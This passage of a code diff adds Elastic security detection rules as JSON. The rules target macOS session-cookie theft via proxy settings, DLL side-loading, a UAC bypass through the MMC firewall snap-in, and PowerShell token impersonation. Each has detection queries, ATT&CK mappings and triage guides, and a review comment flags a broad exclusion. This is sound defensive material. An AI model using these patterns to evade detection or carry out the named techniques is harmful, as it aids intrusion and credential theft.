"version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "10a500bb-a28f-418e-ba29-ca4c8d1a9f2f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1539", + "name": "Steal Web Session Cookie", + "reference": "https://attack.mitre.org/techniques/T1539/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_109.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_109.json new file mode 100644 index 00000000000..b82cba039cf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_109.json 
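Review bot: The `"/usr/libexec/xpcproxy"` entry in the `not process.parent.executable` exclusion of `query` is broad: xpcproxy is the launchd helper that spawns launchd-managed jobs, so a `networksetup -setwebproxy` run from a LaunchAgent or LaunchDaemon would likely carry it as parent and be suppressed, which removes the scheduled and persistent execution paths from the rule's coverage. If the exclusion exists to silence one known benign job, narrowing it with an additional condition on `process.args` or `process.executable` and recording that job in the `false_positives` list would keep the suppression targeted and documented. This is inferred from macOS process ancestry rather than from anything on the page, so please confirm against the environment that motivated the exclusion.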
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an instance of a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side loading a malicious DLL within the memory space of one of those processes.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential DLL Side-Loading via Trusted Microsoft Programs", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"WinWord.exe\", \"EXPLORER.EXE\", \"w3wp.exe\", \"DISM.EXE\") and\n not (process.name : (\"winword.exe\", \"explorer.exe\", \"w3wp.exe\", \"Dism.exe\") or\n process.executable : (\"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files?(x86)\\\\Microsoft Office\\\\root\\\\Office*\\\\WINWORD.EXE\",\n \"?:\\\\Windows\\\\System32\\\\Dism.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Dism.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", + "setup": "## Setup\n\nIf enabling an EQL 
rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_110.json b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_110.json new file mode 100644 index 00000000000..874b98dd3ba --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1160dcdb-0a0a-4a79-91d8-9b84616edebd_110.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an instance of a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side loading a malicious DLL within the memory space of one of those processes.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential DLL Side-Loading via Trusted Microsoft Programs", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"WinWord.exe\", \"EXPLORER.EXE\", \"w3wp.exe\", \"DISM.EXE\") and\n not (process.name : (\"winword.exe\", \"explorer.exe\", \"w3wp.exe\", \"Dism.exe\") or\n process.executable : (\"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files?(x86)\\\\Microsoft Office\\\\root\\\\Office*\\\\WINWORD.EXE\",\n \"?:\\\\Windows\\\\System32\\\\Dism.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Dism.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", + "setup": "## Setup\n\nIf enabling 
an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_110.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_110.json new file mode 100644 index 00000000000..e666271d895 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_110.json 
@@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass via Windows Firewall Snap-In Hijack", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n", + "references": [ + "https://github.com/AzAgarampur/byeintegrity-uac" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: 
Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.014", + "name": "MMC", + "reference": "https://attack.mitre.org/techniques/T1218/014/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_111.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_111.json new file mode 100644 index 00000000000..6b964ffc445 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_111.json 
@@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass via Windows Firewall Snap-In Hijack", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n", + "references": [ + "https://github.com/AzAgarampur/byeintegrity-uac" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: 
Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.014", + "name": "MMC", + "reference": "https://attack.mitre.org/techniques/T1218/014/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_11.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_11.json new file mode 100644 index 00000000000..2ea3731da39 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_11.json 
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects scripts that contain PowerShell functions, structures, or Windows API functions related to token impersonation/theft. Attackers may duplicate then impersonate another user's token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Token Impersonation Capabilities", + "note": "## Triage and analysis\n\n### Investigating PowerShell Script with Token Impersonation Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAdversaries can abuse PowerShell to perform token impersonation, which involves duplicating and impersonating another user's token to escalate privileges and bypass access controls. This rule identifies scripts containing PowerShell functions, structures, or Windows API functions related to token impersonation/theft.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine PowerShell process creation and script block logs to identify command line arguments or hardcoded information that can indicate which user was the target of the impersonation.\n- Investigate any abnormal behavior by the subject process (PowerShell), such as network connections, registry or file modifications, and any spawned child processes.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account 
